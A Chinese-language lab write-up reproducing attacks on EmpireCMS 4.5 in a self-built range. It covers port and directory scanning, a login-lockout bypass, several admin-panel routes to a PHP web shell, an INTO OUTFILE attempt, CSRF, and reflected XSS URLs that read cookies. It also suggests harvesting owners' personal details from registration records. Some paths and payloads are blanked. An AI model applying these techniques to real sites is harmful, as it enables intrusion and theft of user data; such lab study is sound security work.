EmpireCMS4.5 渗透测试及靶场搭建（漏洞复现）

首先，利用nmap工具端口扫描。使用的命令如下

nmap -T4 -A -v 192.168.200.16 #扫描速度为T4，强力扫描，并且扫扫描细节

通过开放的端口，可以获取端口的说明信息以及攻击方向

ip查询

通过站长之家，进行ip地址查询具体信息，可以看到这是私人的ip地址，并且是自己集成的靶场环境。

可以从各种途径上获取搭建网站所使用的脚本、类型、框架等信息，获取有关他们存在的漏洞信息

扫描后台敏感目录(工具和御剑工具)

通过爆破网站目录可以看到一个非常有用的信息：/.txt，这个文件是禁止爬虫的，这里面存放的全是网站的敏感信息，不妨试试

由此推进，访问/e/这个目录，它一般是存放和配置文件有关的信息的，当我们尝试访问后可以发现，第一个是网站的主目录，第二个是网站的存储数据库等信息的文件

访问配置文件是空白，网站肯定是做了什么过滤，那么这里面的内容应该很重要

但是我们可以看到重要的信息，比如网站后台有关的admin目录都没有显示出来，从而推断/e这个目录很敏感，就再次尝试对它目录扫描，然后几乎全部的敏感目录都爆出来了（状态码200的能够访问）

通过尝试，终于发现后台路径！（如果想知道更多目录内的信息还需要重复此类操作，不过在浪费这些时间之前，我们还是要一步步的来，拿到网站为主）

后台界面

御剑爆破结果

随便输入的账户admin和密码，网页显示（没有注意后台错误5次限制登录，最主要的是有密保问题，如果设置了，还得另想办法。先按照正常的流程测试）

那么没办法，只能从两个选择集束炸弹模式

选择常用的字典进行爆破之后，从反馈的页面的发现，弱口令爆破是行不通的

解决方案：

①更改配置文件（ /e//.php）

：5，错误次数

:60，锁定时间

②使用ip代理池（谨慎使用）

③社工手段

本题中选择更改配置文件绕过

则顺利爆破登录成功

成功登录网站后台！

点击网站的后台能够查到网站数据库信息

我们的一个目的已经达成

浏览器语法使用

site 指定域名

**inurl url中存在关键字的网页 **

** 指定文件类型 **

**info 查找指定站点的基本信息 **

备案信息查询

网站底部有icp等内容，可以称为获取对方公司和法人的信息（手机号，微信号，邮箱等）

指纹识别

时kali当中的一款工具，可以更清楚的知道网站中可以为自己所用的信息

更改参数信息

参数设置页面，限制了很多可以文件上传的后缀名，很多可以上传文件的位置都做了严格的过滤，倘若更改限制后缀名那么相信木马文件也可以轻松上传

通过以上的信息收集，可以获取到对方搭建网站的脚本信息并由此去互联网上寻找到开源的漏洞信息，对方使用的是何种服务器，根据ip所在地可以查询到对方住址等，最后黑进对方后台可以看到对方数据库的信息，想辙将其导出，便可以获取到本网站的用户的重要信息等。

二、漏洞探测

设计工具：

端口扫描：nmap

敏感目录扫描：，御剑

ip属地查询：站长之家，fofa等网页工具

网络抓包工具、弱口令爆破工具：

蚁剑：拿取网站

火狐浏览器插件：获取网站的数据库、框架、编程语言、操作系统等信息

：对涉及含有sql注入的url进行扫描

**

三、漏洞利用，获取 (一)代码执行 后台获取 系统–》广利数据表–》导入数据表

本地准备一个1.php并改名为1.php.mod，用$进行转义，存放的数据表名需要填一个数据库内没有的表名（随便都行）

<?php file_put_contents("shell.php","");?>

#file_put_contents() 函数：创建并写入一个新文件
file_put_contents ( string $filename , mixed $data [, int $flags = 0 [, resource $context ]] )
参数						描述
filename				必需。规定要写入数据的文件。如果文件不存在，则创建一个新文件。
data						必需。规定要写入文件的数据。可以是字符串、数组或数据流。
flags						可选。规定如何打开/写入文件。可能的值：FILE_USE_INCLUDE_PATHFILE_APPENDLOCK_EX
context					可选。规定文件句柄的环境。context 是一套可以修改流的行为的选项。

尝试访问文件所在路径，用访问，可以看到出现PHP版本信息，那么证明此文件是被上传到服务器的了，最后可以进行蚁剑连接，拿取shell

蚁剑连接成功

此时可以遍历目录

这题用到代码审计

更改文件后缀和修改MIME以及增加文件头绕过方法都是行不通的，会出现下边的空白页面

获取shell 系统–》备份数据–》选择任意–》开始备份

简介：未对数据库表名做验证，通过修改数据库表名可以实现任意代码

漏洞位置：/e/admin/ebak/phome.php

抓包修改为

放包后可以查看到php版本信息

下载下来观察里面的文件信息

.txt是没有什么重要信息的

而.php当中含有写入的()

浏览此文件所在的路径，看看会出现是否是PHP版本信息的页面，修改配置文件.txt改为.php

这样是无法连接蚁剑的，尝试将后改为一句话木马

当放包之后会出现表不存在等问题，不过不影响

后

同上的操作（或者也可以不执行这步，可以从链接当中知道文件的所在路径）

目录遍历，shell拿到了

代码注入获取shell

… into 语句写入php一句话木马

select '' into outfile 'C:/phpStudy/PHPTutorial/WWW/EmpireCMS/e/admin/1.php'

出现下面这种错误明显是不能够成功的，它限制数据库的导入跟导出，判断 = NULL，所以当实战中出现在这种情况下是不能够用这种方法

添加上这句语句在做尝试

显示无法写入文件

漏洞复现文章出处：

后台拿SHELL 模板–》公告模板–》JS调用登录模板

在此位置插入一句话木马，最终

源码当中的一句话木马已经被写入，证明肯定时写入到文件里面了

链接蚁剑，拿取shell

遍历目录

获取shell 栏目–》自定义页面–》管理自定义页面处可以写下

成功在网站根目录写入

连接蚁剑

目录遍历

(二)CSRF（跨站请求伪造）

1.在会员中心页面点击修改密码时抓包

将上述的html代码，编写成脚本放到下的www目录

(三)XSS（跨站脚本攻击） A、反射型：

通过目录扫描，我们可以知道很多存在漏洞的网页

1.漏洞代码位置：/e//index.html

可以先创建栏目信息

然后点击图片

漏洞页面

#漏洞原理：url地址经过函数处理之后,

把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值

代码分析

if(Request("url")!=0){document.write(
"+Request("url")+"\" target=\"_blank\">
+Request("url")+"\" border=0 
class=\"picborder\" onmousewheel=\"return bbimg(this)\" 
οnlοad=\"if(this.width>screen.width-500)this.style.width=screen.width-500;\">");

http://192.168.200.16/EmpireCMS/e/ViewImg/index.html?url=javascript:alert(document.cookie)

案例：<script>alert(cmd)</script>

http://192.168.200.16/empirecms/e/admin/openpage/AdminPage.php?mainfile=javascript:alert('xss')

http://192.168.200.16/empirecms/e/admin/openpage/AdminPage.php?ehash_k3gQY=XJ8adxjZ1pt0wTdqmKO6&mainfile=javascript:alert('xss')

http://192.168.200.16/empirecms/e/admin/openpage/AdminPage.php?ehash_k3gQY=XJ8adxjZ1pt0wTdqmKO6&mainfile=javascript:alert(document.cookie)

http://192.168.200.16/EmpireCMS/e/admin/openpage/AdminPage.php?ehash_xAg67=sKjkNY3V9KKhz7rFcbRC&leftfile=javascript:alert('xss')

http://192.168.200.16/EmpireCMS/e/admin/openpage/AdminPage.php?ehash_xAg67=sKjkNY3V9KKhz7rFcbRC&title=javascript:alert(%27xss%27)

<script>alert(111)</script>

http://192.168.200.16/EmpireCMS/e/admin/admin.php?ehash_6kKRg=CXVSjNWzn2qTJzbFn8kr